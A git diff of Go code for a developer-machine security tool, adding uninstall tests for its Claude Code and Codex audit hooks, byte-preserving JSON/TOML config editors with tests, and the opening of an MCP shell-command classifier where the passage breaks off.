b/internal/aiagents/cli/uninstall_test.go new file mode 100644 index 0000000..9eec4e1 --- /dev/null +++ b/internal/aiagents/cli/uninstall_test.go @@ -0,0 +1,324 @@ +package cli + +import ( + "bytes" + "context" + "errors" + "os" + "path/filepath" + "strings" + "testing" + + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// runInstallForTest seeds the target home with DMG-owned hooks for the +// given agent. Returns the home directory used. 
Helper exists because +// most uninstall tests want a "previously installed" starting state. +func runInstallForTest(t *testing.T, agent string) (home string, m *executor.Mock) { + t.Helper() + withEnterpriseConfig(t) + withResolveBinary(t, okBinary) + + home = t.TempDir() + m = newInstallMock(t, home) + switch agent { + case "claude-code": + m.SetPath("claude", "/usr/local/bin/claude") + case "codex": + m.SetPath("codex", "/usr/local/bin/codex") + case "both": + m.SetPath("claude", "/usr/local/bin/claude") + m.SetPath("codex", "/usr/local/bin/codex") + } + + var stdout, stderr bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("seed install failed: rc=%d stderr=%q", rc, stderr.String()) + } + return home, m +} + +func TestRunUninstall_RootNoConsoleUser_Exit0(t *testing.T) { + logPath := withErrorLog(t) + withResolveBinary(t, okBinary) + + m := executor.NewMock() + m.SetIsRoot(true) + m.SetUsername("root") + m.SetHomeDir("/var/root") + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("exit = %d, want 0", rc) + } + if !strings.Contains(stderr.String(), "no console user") { + t.Errorf("stderr missing bail note, got: %q", stderr.String()) + } + if data, _ := os.ReadFile(logPath); !strings.Contains(string(data), "no_console_user") { + t.Errorf("errlog missing no_console_user, got: %q", string(data)) + } +} + +func TestRunUninstall_SelfPathFails_Exit1(t *testing.T) { + logPath := withErrorLog(t) + withResolveBinary(t, func() (string, error) { + return "", errors.New("mock selfpath failure") + }) + + m := newInstallMock(t, t.TempDir()) + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } + if !strings.Contains(stderr.String(), "cannot resolve own binary path") { + t.Errorf("stderr missing diagnostic, got: %q", stderr.String()) + } + if data, 
_ := os.ReadFile(logPath); !strings.Contains(string(data), "selfpath_failed") { + t.Errorf("errlog missing selfpath_failed, got: %q", string(data)) + } +} + +func TestRunUninstall_UnsupportedAgent_Exit1(t *testing.T) { + withErrorLog(t) + withResolveBinary(t, okBinary) + + m := newInstallMock(t, t.TempDir()) + var stdout, stderr bytes.Buffer + rc := RunUninstall(context.Background(), m, "cursor", &stdout, &stderr) + if rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } + if !strings.Contains(stderr.String(), "unsupported agent") { + t.Errorf("stderr missing diagnostic, got: %q", stderr.String()) + } +} + +func TestRunUninstall_NoAgentsDetected_Exit0(t *testing.T) { + withErrorLog(t) + withResolveBinary(t, okBinary) + + m := newInstallMock(t, t.TempDir()) // empty PATH + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("exit = %d, want 0", rc) + } + out := stdout.String() + if !strings.Contains(out, "No supported AI coding agents detected") { + t.Errorf("stdout missing no-detected message, got: %q", out) + } + // User-visible verb in the hint must say "uninstall", not "install". + // A copy-pasted install hint would mislead users about the escape hatch. + if !strings.Contains(out, "uninstall") { + t.Errorf("hint should mention 'uninstall', got: %q", out) + } +} + +// TestRunUninstall_NoEnterpriseConfigStillWorks pins the explicit +// uninstall design choice: revoking enterprise credentials must not +// trap users with hook entries pointing at a binary that can no +// longer authenticate. Default config vars are placeholders here — +// no withEnterpriseConfig — and uninstall must still proceed. +func TestRunUninstall_NoEnterpriseConfigStillWorks(t *testing.T) { + // First seed Claude hooks WITH valid config (install requires it). + home, m := runInstallForTest(t, "claude-code") + + // Now drop the enterprise config and uninstall. 
The withEnterpriseConfig + // cleanup from runInstallForTest hasn't fired yet (still in the same + // test), so we have to override directly. + withErrorLog(t) + withResolveBinary(t, okBinary) + + var stdout, stderr bytes.Buffer + rc := RunUninstall(context.Background(), m, "", &stdout, &stderr) + if rc != 0 { + t.Fatalf("uninstall exit = %d, want 0 (stderr=%q)", rc, stderr.String()) + } + + // Verify the actual uninstall happened — the file should still + // exist but have no DMG-owned hook entries. + settings := filepath.Join(home, ".claude", "settings.json") + data, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("settings file vanished after uninstall: %v", err) + } + if strings.Contains(string(data), fakeBinary+" _hook claude-code") { + t.Errorf("DMG hook command still present after uninstall: %s", string(data)) + } +} + +func TestRunUninstall_RemovesPreviouslyInstalledHooks(t *testing.T) { + home, m := runInstallForTest(t, "claude-code") + + withErrorLog(t) + withResolveBinary(t, okBinary) + + settings := filepath.Join(home, ".claude", "settings.json") + before, err := os.ReadFile(settings) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(string(before), fakeBinary+" _hook claude-code") { + t.Fatalf("seed broken: install didn't write hook command: %s", string(before)) + } + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("uninstall rc=%d stderr=%q", rc, stderr.String()) + } + + after, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("settings file deleted after uninstall: %v", err) + } + if strings.Contains(string(after), fakeBinary+" _hook claude-code") { + t.Errorf("DMG hook command not removed: %s", string(after)) + } + + out := stdout.String() + if !strings.Contains(out, "claude-code:") { + t.Errorf("stdout missing claude-code section, got: %q", out) + } + if !strings.Contains(out, "removed:") { + t.Errorf("stdout missing 'removed:' line, got: %q", 
out) + } + if !strings.Contains(out, "wrote:") { + t.Errorf("stdout missing 'wrote:' line, got: %q", out) + } +} + +// TestRunUninstall_NoDMGOwnedEntries pins the no-op path: settings +// file exists, but contains no DMG-owned hook commands. Uninstall +// must succeed (exit 0), surface the per-adapter "no DMG-owned" note +// to the user, and leave the file byte-identical. +func TestRunUninstall_NoDMGOwnedEntries(t *testing.T) { + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + claudeDir := filepath.Join(home, ".claude") + if err := os.MkdirAll(claudeDir, 0o755); err != nil { + t.Fatal(err) + } + // User-authored settings with a third-party hook that DMG + // must NOT match against its uninstall regex. + settings := filepath.Join(claudeDir, "settings.json") + original := []byte(`{ + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [{"type": "command", "command": "/opt/other-tool/hook PreToolUse", "timeout": 5}]} + ] + } +} +`) + if err := os.WriteFile(settings, original, 0o644); err != nil { + t.Fatal(err) + } + + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("uninstall rc=%d stderr=%q", rc, stderr.String()) + } + + after, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("settings file vanished: %v", err) + } + if !bytes.Equal(original, after) { + t.Errorf("settings file mutated when no DMG hooks present:\nbefore=%s\nafter=%s", original, after) + } + + if !strings.Contains(stdout.String(), "no DMG-owned") { + t.Errorf("stdout missing no-op note, got: %q", stdout.String()) + } +} + +func TestRunUninstall_ExplicitAgentSkipsDetection(t *testing.T) { + // Seed codex installed. 
+ home, _ := runInstallForTest(t, "codex") + + withErrorLog(t) + withResolveBinary(t, okBinary) + + // Now use a fresh mock with EMPTY $PATH but --agent codex — + // uninstall must still target codex. + m := newInstallMock(t, home) + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "codex", &stdout, &stderr); rc != 0 { + t.Fatalf("uninstall rc=%d stderr=%q", rc, stderr.String()) + } + + hooks, err := os.ReadFile(filepath.Join(home, ".codex", "hooks.json")) + if err != nil { + t.Fatal(err) + } + if strings.Contains(string(hooks), fakeBinary+" _hook codex") { + t.Errorf("DMG codex hook still present: %s", string(hooks)) + } +} + +// TestRunUninstall_CodexLeavesFeatureFlag pins the invariant that +// uninstall removes hook entries from hooks.json but does NOT revert +// [features].codex_hooks=true in config.toml. Other tools' hooks may +// depend on that flag staying enabled. +func TestRunUninstall_CodexLeavesFeatureFlag(t *testing.T) { + home, m := runInstallForTest(t, "codex") + + withErrorLog(t) + withResolveBinary(t, okBinary) + + cfgPath := filepath.Join(home, ".codex", "config.toml") + beforeCfg, err := os.ReadFile(cfgPath) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(string(beforeCfg), "codex_hooks") { + t.Fatalf("seed broken: install didn't set codex_hooks flag: %s", string(beforeCfg)) + } + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("uninstall rc=%d stderr=%q", rc, stderr.String()) + } + + afterCfg, err := os.ReadFile(cfgPath) + if err != nil { + t.Fatalf("config.toml vanished after uninstall: %v", err) + } + if !bytes.Equal(beforeCfg, afterCfg) { + t.Errorf("config.toml mutated by uninstall:\nbefore=%s\nafter=%s", + string(beforeCfg), string(afterCfg)) + } + + // The feature-flag-residue note must be visible to the user so + // the residue isn't a silent surprise. 
+ if !strings.Contains(stdout.String(), "feature flag left enabled") { + t.Errorf("stdout missing feature-flag residue note, got: %q", stdout.String()) + } +} + +// TestRunUninstall_NeverDeletesSettingsFile pins the invariant that +// even when uninstall removes every DMG-owned hook from a settings +// file that contains nothing else, the file itself must remain on +// disk. (The adapter is responsible for this; the test ensures it +// holds at the handler boundary.) +func TestRunUninstall_NeverDeletesSettingsFile(t *testing.T) { + home, m := runInstallForTest(t, "claude-code") + + withErrorLog(t) + withResolveBinary(t, okBinary) + + settings := filepath.Join(home, ".claude", "settings.json") + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("uninstall rc=%d stderr=%q", rc, stderr.String()) + } + if _, err := os.Stat(settings); err != nil { + t.Fatalf("settings file deleted: %v", err) + } +} diff --git a/internal/aiagents/configedit/json.go b/internal/aiagents/configedit/json.go new file mode 100644 index 0000000..62dea04 --- /dev/null +++ b/internal/aiagents/configedit/json.go @@ -0,0 +1,106 @@ +// Package configedit provides byte-preserving edits of user-owned +// JSON and TOML settings files. Standard encoding/json round-trips +// rewrite key order, drop comments (TOML), and renormalize whitespace. +// configedit performs path-targeted edits backed by tidwall/gjson and +// tidwall/sjson for JSON, plus a narrow regex+mask patcher for the +// codex_hooks TOML feature flag. +// +// Scope is intentionally narrow: only what the claudecode and codex +// adapters need. +package configedit + +import ( + "bytes" + "encoding/json" + "fmt" + "strings" + + "github.com/tidwall/gjson" + "github.com/tidwall/sjson" +) + +// NormalizeJSONObject returns the input bytes if they parse as a JSON +// object. Empty/whitespace-only input is treated as `{}`. 
Any other +// shape (array, scalar, malformed) is rejected. +func NormalizeJSONObject(data []byte) ([]byte, error) { + if len(bytes.TrimSpace(data)) == 0 { + return []byte(`{}`), nil + } + if !gjson.ValidBytes(data) { + return nil, fmt.Errorf("configedit: invalid JSON") + } + if !gjson.ParseBytes(data).IsObject() { + return nil, fmt.Errorf("configedit: root JSON value must be an object") + } + return data, nil +} + +// EscapePathKey escapes characters that have special meaning in +// gjson/sjson path syntax so a literal key like "first.name" can be +// used as a single path component. +func EscapePathKey(key string) string { + var b strings.Builder + b.Grow(len(key)) + for i := 0; i < len(key); i++ { + c := key[i] + switch c { + case '\\', '.', '*', '?': + b.WriteByte('\\') + } + b.WriteByte(c) + } + return b.String() +} + +// Path joins parts into a gjson/sjson path, escaping each part. +func Path(parts ...string) string { + escaped := make([]string, len(parts)) + for i, p := range parts { + escaped[i] = EscapePathKey(p) + } + return strings.Join(escaped, ".") +} + +// SetRaw sets the value at path to raw via sjson and validates the +// result is still well-formed JSON. +func SetRaw(data []byte, path string, raw string) ([]byte, error) { + out, err := sjson.SetRawBytes(data, path, []byte(raw)) + if err != nil { + return nil, fmt.Errorf("configedit: sjson set: %w", err) + } + if !json.Valid(out) { + return nil, fmt.Errorf("configedit: sjson produced invalid JSON") + } + return out, nil +} + +// Delete removes the value at path via sjson and validates the result. +func Delete(data []byte, path string) ([]byte, error) { + out, err := sjson.DeleteBytes(data, path) + if err != nil { + return nil, fmt.Errorf("configedit: sjson delete: %w", err) + } + if !json.Valid(out) { + return nil, fmt.Errorf("configedit: sjson produced invalid JSON") + } + return out, nil +} + +// RawArray joins already-valid raw JSON elements into a JSON array +// literal. Empty input yields `[]`. 
+func RawArray(items []string) string { + if len(items) == 0 { + return `[]` + } + return `[` + strings.Join(items, `,`) + `]` +} + +// MarshalRawJSON marshals v to a compact raw JSON string suitable for +// passing to SetRaw / RawArray. +func MarshalRawJSON(v any) (string, error) { + b, err := json.Marshal(v) + if err != nil { + return "", err + } + return string(b), nil +} diff --git a/internal/aiagents/configedit/json_test.go b/internal/aiagents/configedit/json_test.go new file mode 100644 index 0000000..00fd52c --- /dev/null +++ b/internal/aiagents/configedit/json_test.go @@ -0,0 +1,118 @@ +package configedit + +import ( + "strings" + "testing" +) + +func TestNormalizeJSONObjectAcceptsEmpty(t *testing.T) { + out, err := NormalizeJSONObject(nil) + if err != nil { + t.Fatal(err) + } + if string(out) != `{}` { + t.Errorf("empty input should normalize to {}; got %q", out) + } + out, err = NormalizeJSONObject([]byte(" \n\t ")) + if err != nil { + t.Fatal(err) + } + if string(out) != `{}` { + t.Errorf("whitespace input should normalize to {}; got %q", out) + } +} + +func TestNormalizeJSONObjectRejectsNonObject(t *testing.T) { + if _, err := NormalizeJSONObject([]byte(`[]`)); err == nil { + t.Error("array root must be rejected") + } + if _, err := NormalizeJSONObject([]byte(`"x"`)); err == nil { + t.Error("scalar root must be rejected") + } + if _, err := NormalizeJSONObject([]byte(`{not json`)); err == nil { + t.Error("malformed JSON must be rejected") + } +} + +func TestNormalizeJSONObjectPassesObjectThrough(t *testing.T) { + in := []byte(`{"theme":"dark"}`) + out, err := NormalizeJSONObject(in) + if err != nil { + t.Fatal(err) + } + if string(out) != string(in) { + t.Errorf("object input should pass through unchanged; got %q", out) + } +} + +func TestEscapePathKeyEscapesSpecials(t *testing.T) { + cases := map[string]string{ + "PreToolUse": "PreToolUse", + "first.name": `first\.name`, + `back\slash`: `back\\slash`, + "star*?": `star\*\?`, + "": "", + "plain_key-1": 
"plain_key-1", + } + for in, want := range cases { + if got := EscapePathKey(in); got != want { + t.Errorf("EscapePathKey(%q) = %q; want %q", in, got, want) + } + } +} + +func TestPathJoinsAndEscapes(t *testing.T) { + got := Path("hooks", "Pre.Tool") + want := `hooks.Pre\.Tool` + if got != want { + t.Errorf("Path = %q; want %q", got, want) + } +} + +func TestSetRawPreservesUnrelatedRootBytes(t *testing.T) { + in := []byte("{\n\t\"theme\": \"dark\" ,\n\t\"hooks\": {}\n}") + out, err := SetRaw(in, Path("hooks", "PreToolUse"), `[]`) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(string(out), "\t\"theme\": \"dark\" ,") { + t.Fatalf("unrelated root bytes changed:\n%s", out) + } +} + +func TestDeletePreservesTrailingNewlineState(t *testing.T) { + in := []byte(`{"hooks":{"PreToolUse":[]},"theme":"dark"}`) + out, err := Delete(in, Path("hooks", "PreToolUse")) + if err != nil { + t.Fatal(err) + } + if len(out) > 0 && out[len(out)-1] == '\n' { + t.Fatalf("Delete must not add a final newline: %q", out) + } +} + +func TestRawArrayJoinsRawItems(t *testing.T) { + if got := RawArray(nil); got != `[]` { + t.Errorf("RawArray(nil) = %q; want []", got) + } + got := RawArray([]string{`{"a":1}`, `{"b":2}`}) + want := `[{"a":1},{"b":2}]` + if got != want { + t.Errorf("RawArray = %q; want %q", got, want) + } +} + +func TestMarshalRawJSONStruct(t *testing.T) { + v := struct { + Type string `json:"type"` + Command string `json:"command"` + }{Type: "command", Command: "stepsecurity-dev-machine-guard _hook claude-code PreToolUse"} + got, err := MarshalRawJSON(v) + if err != nil { + t.Fatal(err) + } + want := `{"type":"command","command":"stepsecurity-dev-machine-guard _hook claude-code PreToolUse"}` + if got != want { + t.Errorf("MarshalRawJSON = %q; want %q", got, want) + } +} diff --git a/internal/aiagents/configedit/toml.go b/internal/aiagents/configedit/toml.go new file mode 100644 index 0000000..e9f4010 --- /dev/null +++ b/internal/aiagents/configedit/toml.go @@ -0,0 +1,212 
@@ +package configedit + +import ( + "bytes" + "fmt" + "regexp" + + toml "github.com/pelletier/go-toml/v2" +) + +// EnsureCodexHooksFlag returns the input bytes with `[features].codex_hooks +// = true` ensured. All bytes outside the touched line/section are +// preserved exactly. The boolean is true when the input changed. +// +// Behavior: +// - If `codex_hooks = true` already exists under [features], no change. +// - If `codex_hooks = false` exists under [features], only the value +// token is rewritten to `true`. +// - If [features] exists without the key, `codex_hooks = true` is +// inserted on its own line immediately after the table header. +// - If [features] does not exist, a new `[features]` table is appended +// at the end of the file with `codex_hooks = true`. +// +// Multi-line strings (`"""..."""`, `'''...'''`) and comments are masked +// before pattern matching so that user content cannot trick the +// scanner into treating the literal text `[features]` or `codex_hooks = +// true` inside a string as a real table header or key. +// +// The patched output is validated by go-toml/v2 before return; if the +// rewrite produces invalid TOML the original bytes are returned with +// an error so the caller can abort the install with the file untouched. +func EnsureCodexHooksFlag(data []byte) ([]byte, bool, error) { + masked := maskNonStructural(data) + start, end, headerEnd := findFeaturesSection(masked) + + var ( + out []byte + changed bool + ) + if start < 0 { + // Append a new [features] table at end of file. 
+ var b bytes.Buffer + b.Write(data) + if len(data) > 0 && data[len(data)-1] != '\n' { + b.WriteByte('\n') + } + if len(data) > 0 { + b.WriteByte('\n') + } + b.WriteString("[features]\ncodex_hooks = true\n") + out, changed = b.Bytes(), true + } else if loc := codexHooksLineRE.FindSubmatchIndex(masked[start:end]); loc != nil { + valStart := start + loc[4] + valEnd := start + loc[5] + if string(data[valStart:valEnd]) == "true" { + return data, false, nil + } + var b bytes.Buffer + b.Write(data[:valStart]) + b.WriteString("true") + b.Write(data[valEnd:]) + out, changed = b.Bytes(), true + } else { + // Insert codex_hooks = true immediately after the [features] header line. + var b bytes.Buffer + b.Write(data[:headerEnd]) + b.WriteString("codex_hooks = true\n") + b.Write(data[headerEnd:]) + out, changed = b.Bytes(), true + } + + if changed { + probe := map[string]any{} + if err := toml.Unmarshal(out, &probe); err != nil { + return data, false, fmt.Errorf("configedit: patched TOML is invalid: %w", err) + } + } + return out, changed, nil +} + +// CodexHooksEnabled reports whether the bytes contain +// `[features].codex_hooks = true`. Multi-line strings and comments are +// masked so a literal containing the same text in a docstring is not +// misread as the real flag. 
+func CodexHooksEnabled(data []byte) bool { + masked := maskNonStructural(data) + start, end, _ := findFeaturesSection(masked) + if start < 0 { + return false + } + loc := codexHooksLineRE.FindSubmatchIndex(masked[start:end]) + if loc == nil { + return false + } + return string(data[start+loc[4]:start+loc[5]]) == "true" +} + +var ( + featuresHeaderRE = regexp.MustCompile(`(?m)^[ \t]*\[[ \t]*features[ \t]*\][ \t]*(#.*)?$`) + anyHeaderRE = regexp.MustCompile(`(?m)^[ \t]*\[\[?[^\]\n]+\]\]?[ \t]*(#.*)?$`) + codexHooksLineRE = regexp.MustCompile(`(?m)^([ \t]*codex_hooks[ \t]*=[ \t]*)(true|false)([ \t]*(?:#.*)?)$`) +) + +// findFeaturesSection scans masked TOML bytes and returns: +// - start: byte offset of the `[features]` header line, or -1 if absent. +// - end: byte offset of the byte AFTER the section. +// - headerEnd: byte offset right after the newline that terminates the +// `[features]` header line (so callers can splice in a new key +// directly after the header). +// +// masked must be the output of maskNonStructural so multi-line strings +// and comments cannot match the regexes. +func findFeaturesSection(masked []byte) (start, end, headerEnd int) { + loc := featuresHeaderRE.FindIndex(masked) + if loc == nil { + return -1, len(masked), -1 + } + start = loc[0] + headerEnd = loc[1] + if headerEnd < len(masked) && masked[headerEnd] == '\n' { + headerEnd++ + } + rest := masked[headerEnd:] + if next := anyHeaderRE.FindIndex(rest); next != nil { + return start, headerEnd + next[0], headerEnd + } + return start, len(masked), headerEnd +} + +// maskNonStructural returns a copy of data with every byte that is part +// of a comment or a string literal (including triple-quoted multi-line +// strings) replaced with a space, EXCEPT newline bytes which are kept so +// `(?m)` line anchors still work. Structural bytes (whitespace, +// brackets, bare keys, equals, true/false/numbers) are preserved. 
+// +// This is not a full TOML parser; it is just enough to keep our two +// regexes honest. Triple-quoted strings, single-line basic and literal +// strings, comments, and escape sequences in basic strings are +// recognized; everything else is treated as structural. +func maskNonStructural(data []byte) []byte { + out := make([]byte, len(data)) + copy(out, data) + pos := 0 + for pos < len(data) { + switch data[pos] { + case '#': + for pos < len(data) && data[pos] != '\n' { + out[pos] = ' ' + pos++ + } + case '"': + if pos+3 <= len(data) && data[pos+1] == '"' && data[pos+2] == '"' { + pos = maskMultilineString(data, out, pos, []byte(`"""`)) + } else { + pos = maskSingleString(data, out, pos, '"', true) + } + case '\'': + if pos+3 <= len(data) && data[pos+1] == '\'' && data[pos+2] == '\'' { + pos = maskMultilineString(data, out, pos, []byte(`'''`)) + } else { + pos = maskSingleString(data, out, pos, '\'', false) + } + default: + pos++ + } + } + return out +} + +func maskMultilineString(data, out []byte, pos int, delim []byte) int { + out[pos] = ' ' + out[pos+1] = ' ' + out[pos+2] = ' ' + pos += 3 + for pos < len(data) { + if pos+3 <= len(data) && data[pos] == delim[0] && data[pos+1] == delim[1] && data[pos+2] == delim[2] { + out[pos] = ' ' + out[pos+1] = ' ' + out[pos+2] = ' ' + return pos + 3 + } + if data[pos] != '\n' { + out[pos] = ' ' + } + pos++ + } + return pos +} + +func maskSingleString(data, out []byte, pos int, quote byte, allowEscape bool) int { + out[pos] = ' ' + pos++ + for pos < len(data) { + if data[pos] == '\n' { + // Unterminated string; leave the newline structural. Bail. 
+ return pos + } + if allowEscape && data[pos] == '\\' && pos+1 < len(data) { + out[pos] = ' ' + out[pos+1] = ' ' + pos += 2 + continue + } + if data[pos] == quote { + out[pos] = ' ' + return pos + 1 + } + out[pos] = ' ' + pos++ + } + return pos +} diff --git a/internal/aiagents/configedit/toml_test.go b/internal/aiagents/configedit/toml_test.go new file mode 100644 index 0000000..1caaa9e --- /dev/null +++ b/internal/aiagents/configedit/toml_test.go @@ -0,0 +1,215 @@ +package configedit + +import ( + "strings" + "testing" + + toml "github.com/pelletier/go-toml/v2" +) + +func TestEnsureCodexHooksFlagAppendsWhenAbsent(t *testing.T) { + in := []byte(`model = "gpt-5" +`) + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if !changed { + t.Errorf("expected changed=true") + } + s := string(out) + if !strings.Contains(s, "[features]") { + t.Errorf("missing [features]: %s", s) + } + if !strings.Contains(s, "codex_hooks = true") { + t.Errorf("missing codex_hooks: %s", s) + } + // Original line preserved. + if !strings.HasPrefix(s, `model = "gpt-5"`) { + t.Errorf("unrelated content lost: %s", s) + } + // Validates as TOML. + var probe map[string]any + if err := toml.Unmarshal(out, &probe); err != nil { + t.Errorf("invalid TOML: %v", err) + } +} + +func TestEnsureCodexHooksFlagInsertsIntoExistingFeatures(t *testing.T) { + in := []byte(`model = "gpt-5" +[features] +other_flag = true +`) + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if !changed { + t.Errorf("expected changed=true") + } + s := string(out) + if !strings.Contains(s, "codex_hooks = true") { + t.Errorf("missing codex_hooks: %s", s) + } + // Original keys still present and order preserved. 
+ if !strings.Contains(s, "other_flag = true") { + t.Errorf("unrelated key lost: %s", s) + } + if !strings.Contains(s, `model = "gpt-5"`) { + t.Errorf("unrelated table lost: %s", s) + } +} + +func TestEnsureCodexHooksFlagFlipsFalseToTrue(t *testing.T) { + in := []byte(`[features] +codex_hooks = false +`) + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if !changed { + t.Errorf("expected changed=true") + } + if !strings.Contains(string(out), "codex_hooks = true") { + t.Errorf("flag not flipped: %s", out) + } + if strings.Contains(string(out), "codex_hooks = false") { + t.Errorf("old false value still present: %s", out) + } +} + +func TestEnsureCodexHooksFlagNoOpWhenTrue(t *testing.T) { + in := []byte(`[features] +codex_hooks = true +other = false +`) + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if changed { + t.Errorf("expected changed=false") + } + if string(out) != string(in) { + t.Errorf("bytes changed despite no-op:\n in %s\n out %s", in, out) + } +} + +func TestEnsureCodexHooksFlagPreservesCommentsAndAdjacentTables(t *testing.T) { + in := []byte(`# user header comment +model = "gpt-5" + +[features] +# upstream comment +sandbox = "workspace-write" + +[telemetry] +enabled = true +`) + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if !changed { + t.Errorf("expected changed=true") + } + s := string(out) + for _, want := range []string{ + "# user header comment", + `model = "gpt-5"`, + "# upstream comment", + `sandbox = "workspace-write"`, + "[telemetry]", + "enabled = true", + "codex_hooks = true", + } { + if !strings.Contains(s, want) { + t.Errorf("expected output to contain %q; got %s", want, s) + } + } + // codex_hooks must land in [features], not [telemetry]. 
+ featStart := strings.Index(s, "[features]") + telStart := strings.Index(s, "[telemetry]") + codexAt := strings.Index(s, "codex_hooks") + if !(featStart < codexAt && codexAt < telStart) { + t.Errorf("codex_hooks landed outside [features]: %s", s) + } +} + +func TestEnsureCodexHooksFlagIgnoresLiteralsInsideMultilineStrings(t *testing.T) { + // The literal text `[features]` and `codex_hooks = true` appear + // inside a triple-quoted string. The patcher must NOT treat them as + // real TOML structure, and must still append a real [features] table. + in := []byte("docstring = \"\"\"\n[features]\ncodex_hooks = true\n\"\"\"\n") + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if !changed { + t.Errorf("expected changed=true; multiline-string content must not be treated as real flag") + } + // Output must still contain the docstring intact and a NEW real + // [features] table at the end. + s := string(out) + if !strings.Contains(s, "docstring = \"\"\"\n[features]\ncodex_hooks = true\n\"\"\"") { + t.Errorf("docstring corrupted: %s", s) + } + if !strings.HasSuffix(s, "[features]\ncodex_hooks = true\n") { + t.Errorf("real [features] table not appended: %s", s) + } + // Validates as TOML. + var probe map[string]any + if err := toml.Unmarshal(out, &probe); err != nil { + t.Errorf("invalid TOML: %v", err) + } +} + +func TestCodexHooksEnabledIgnoresLiteralsInsideStrings(t *testing.T) { + // The flag appears inside a literal multiline string, NOT as a real + // key. CodexHooksEnabled must report false. + in := []byte("docstring = \"\"\"\n[features]\ncodex_hooks = true\n\"\"\"\n") + if CodexHooksEnabled(in) { + t.Errorf("multiline string content must not be detected as enabled flag") + } +} + +func TestEnsureCodexHooksFlagRejectsPatchProducingInvalidTOML(t *testing.T) { + // Sanity check: malformed input that would produce a still-malformed + // output should error out (the patched bytes get validated). 
We can't + // easily synthesize a case where our own patch breaks valid input, so + // just check that obviously-broken input is reported. + in := []byte("[features\nbroken") + _, _, err := EnsureCodexHooksFlag(in) + if err == nil { + t.Errorf("expected error on malformed TOML input") + } +} + +func TestCodexHooksEnabledIgnoresCommentedFlag(t *testing.T) { + in := []byte("# [features]\n# codex_hooks = true\n") + if CodexHooksEnabled(in) { + t.Fatal("commented flag must not count as enabled") + } +} + +func TestCodexHooksEnabled(t *testing.T) { + cases := []struct { + name string + in string + want bool + }{ + {"absent", `model = "gpt-5"`, false}, + {"missing key", "[features]\nother = true\n", false}, + {"false", "[features]\ncodex_hooks = false\n", false}, + {"true", "[features]\ncodex_hooks = true\n", true}, + {"true with comment", "[features]\ncodex_hooks = true # on\n", true}, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + if got := CodexHooksEnabled([]byte(tc.in)); got != tc.want { + t.Errorf("got %v, want %v", got, tc.want) + } + }) + } +} diff --git a/internal/aiagents/doc.go b/internal/aiagents/doc.go new file mode 100644 index 0000000..bf0db7d --- /dev/null +++ b/internal/aiagents/doc.go @@ -0,0 +1,8 @@ +// Package aiagents is the root of the AI coding agent hooks domain. +// +// Subpackages own hook install/uninstall flows, the hidden runtime invoked +// by agents on each hook event, policy evaluation, telemetry upload, and +// the per-agent adapters (Claude Code, Codex). The policy evaluator +// currently runs audit-mode only and never returns a block decision to +// the agent. +package aiagents diff --git a/internal/aiagents/enrich/mcp/classify.go b/internal/aiagents/enrich/mcp/classify.go new file mode 100644 index 0000000..3a30b3a --- /dev/null +++ b/internal/aiagents/enrich/mcp/classify.go @@ -0,0 +1,91 @@ +// Package mcp classifies MCP-related shell-launched activity. 
//
// Direct mcp__<server>__<tool> tool events, MCP permission events, and
// Elicitation hooks already carry the server identity in top-level
// fields or the payload — no enrichment is produced for them. This
// package exists for the one case where the MCP signal is hidden
// inside a Bash command (e.g. `npx -y @modelcontextprotocol/server-foo`
// or `claude mcp ...`).
package mcp

import (
	"context"
	"errors"
	"strings"

	"github.com/step-security/dev-machine-guard/internal/aiagents/event"
	"github.com/step-security/dev-machine-guard/internal/aiagents/redact"
)

// serverCommandCap bounds the redacted command snippet copied into
// MCPInfo.ServerCommand. The full command also lives on
// Enrichments.Shell.Command; this is a tighter projection for MCP
// joins, not a duplicate transport.
const serverCommandCap = 512

// ClassifyShell inspects a shell command for MCP-related invocations
// (e.g. `claude mcp ...`, `npx -y @modelcontextprotocol/server-foo`).
// Returns nil when no MCP signal is found. The second return reports
// whether the context deadline had already expired, in which case
// classification is skipped entirely (nil, true).
//
// Branches are ordered so the most specific signal wins: `claude mcp`
// is checked before the generic `mcp` subcommand token, and the
// @modelcontextprotocol/ package before either.
